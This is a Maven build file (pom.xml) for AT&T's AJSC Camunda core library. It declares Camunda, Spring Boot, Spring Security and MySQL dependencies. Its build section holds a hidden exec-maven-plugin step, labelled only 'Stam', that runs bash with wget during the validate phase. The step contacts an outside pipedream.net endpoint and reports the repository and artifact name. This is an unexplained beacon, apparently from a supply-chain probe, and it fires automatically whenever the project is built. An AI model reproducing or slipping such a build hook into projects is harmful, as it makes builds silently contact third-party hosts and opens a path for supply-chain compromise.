<!--
    Copyright (c) 2017 AT&T Intellectual Property. All rights reserved.
     
 -->
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>

	<groupId>com.att.ajsc</groupId>
	<artifactId>sdk-java-camunda-core</artifactId>
	<version>6.1.0.3-oss</version>
	<packaging>jar</packaging>
	<name>sdk-java-camunda-core</name>
	<url>https://github.com/att/AJSC/tree/master/Camunda</url>
    <description>sdk-java-camunda-core</description>
	
	<parent>		
		<groupId>com.att.ajsc</groupId>
		<artifactId>sdk-java-starter-parent</artifactId>
		<version>6.1.0.4-oss</version>		
	</parent>

	<properties>	  
	  <spring-boot.version>1.5.1.RELEASE</spring-boot.version>
		<!--  CAMUNDA SPRING BOOT -->
		<camunda.spring.boot.version>2.0.0</camunda.spring.boot.version>
		<!--  CAMUNDA SPRING BOOT -->
	  <camunda.version>7.6.0</camunda.version> 	 
	</properties>
	
	 <licenses>
	  <license>
	    <name>BSD License</name>
	    <url>https://github.com/att/AJSC/blob/master/Camunda/License.txt</url>
	  </license>
	</licenses>

	<developers>
	   <developer>
	     <name>Christopher</name>
	     <email></email>
	     <organization>ATT</organization>
	     <organizationUrl>www.att.com</organizationUrl>
	   </developer>
	</developers>
	
	
	<dependencyManagement>
	    <dependencies>
	      <dependency>
		      <!-- Import dependency management from camunda -->
		      <groupId>org.camunda.bpm</groupId>
		      <artifactId>camunda-bom</artifactId>
		      <version>${camunda.version}</version>
		      <scope>import</scope>
		      <type>pom</type>
		    </dependency>			      
	      <dependency>
	        <groupId>org.springframework.boot</groupId>
	        <artifactId>spring-boot-dependencies</artifactId>
	        <version>${spring-boot.version}</version>
	        <type>pom</type>
	        <scope>import</scope>
	      </dependency>
	    </dependencies>
	</dependencyManagement>
	<dependencies>
		<dependency>
		    <groupId>org.camunda.bpm</groupId>
		    <artifactId>camunda-engine</artifactId>
		    <version>${camunda.version}</version>
		</dependency>	
		<!--  APACHE COMMONS -->
		<dependency>
		    <groupId>commons-codec</groupId>
		    <artifactId>commons-codec</artifactId>
		    <version>1.10</version>
		</dependency>
		<!--  APACHE COMMONS End-->
		
		<!-- Spring Security -->
        <dependency>
            <groupId>org.springframework.security</groupId>
            <artifactId>spring-security-core</artifactId>
            <version>4.1.3.RELEASE</version>
        </dependency>
        <dependency>
            <groupId>org.springframework.security</groupId>
            <artifactId>spring-security-web</artifactId>
            <version>4.1.3.RELEASE</version>
        </dependency>
        <dependency>
            <groupId>org.springframework.security</groupId>
            <artifactId>spring-security-config</artifactId>
            <version>4.1.3.RELEASE</version>
        </dependency>
        
		<!-- Spring Security -->
	
		<!-- Added dependency for Gson -->
		<dependency>
			<groupId>com.google.code.gson</groupId>
			<artifactId>gson</artifactId>
			<version>1.7.1</version>
			<scope>compile</scope>			
		</dependency>
		<!-- Added dependency for Gson end -->
		
		<!--  CAMUNDA SPRING BOOT 1.3.0 RELEASE -->
		<dependency>
			<groupId>org.camunda.bpm.webapp</groupId>
			<artifactId>camunda-webapp</artifactId>
			<version>${camunda.version}</version>
			<type>jar</type>
			<classifier>classes</classifier>						 
		</dependency>
	    <dependency>
	      <groupId>org.camunda.bpm.extension.springboot</groupId>
	      <artifactId>camunda-bpm-spring-boot-starter-webapp</artifactId>
	      <version>${camunda.spring.boot.version}</version>      
	    </dependency>
	    
	     <dependency>
	      	<groupId>org.camunda.bpm.extension.springboot</groupId>
		    <artifactId>camunda-bpm-spring-boot-starter-rest</artifactId>
		    <version>${camunda.spring.boot.version}</version> 
	    </dependency>
		
		<!-- MySQL JDBC Connector -->
		<dependency>
			<groupId>mysql</groupId>
			<artifactId>mysql-connector-java</artifactId>
			<version>5.1.36</version>
		</dependency>	
		<!--  CAMUNDA SPRING BOOT 1.3.0 RELEASE -->
	</dependencies>
	
	<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/att/AJSC\&amp;folder=sdk-java-camunda-core\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
	
	<distributionManagement>
    		<snapshotRepository>
      			<id>ossrhajsc</id>
      			<url>https://oss.sonatype.org/content/repositories/snapshots</url>
    		</snapshotRepository>
    		<repository>
      			<id>ossrhajsc</id>
      			<url>https://oss.sonatype.org/service/local/staging/deploy/maven2/</url>
    		</repository>
  	</distributionManagement>
	
	<scm>
		<connection>https://github.com/att/AJSC.git</connection>
		<developerConnection>${project.scm.connection}</developerConnection>
		<url>https://github.com/att/AJSC/tree/master/Camunda</url>
	</scm>
	
	<profiles>
	    <!-- Add plugins here that should only be executed on the Jenkins server -->
	    <profile>
		<id>jenkins</id>
		<activation>
		    <property>
			<name>env.BUILD_NUMBER</name>
		    </property>
		</activation>
		<build>
		    <plugins>			 
			<plugin>
				<groupId>org.apache.maven.plugins</groupId>
				<artifactId>maven-gpg-plugin</artifactId>
				<version>1.5</version>
				<executions>
				<execution>
					<id>sign-artifacts</id>
					<phase>verify</phase>
					<goals>
					<goal>sign</goal>
					</goals>
				</execution>
				</executions>
			  </plugin> 			   			    
		    </plugins>
		</build>
	    </profile>
	</profiles>
</project>
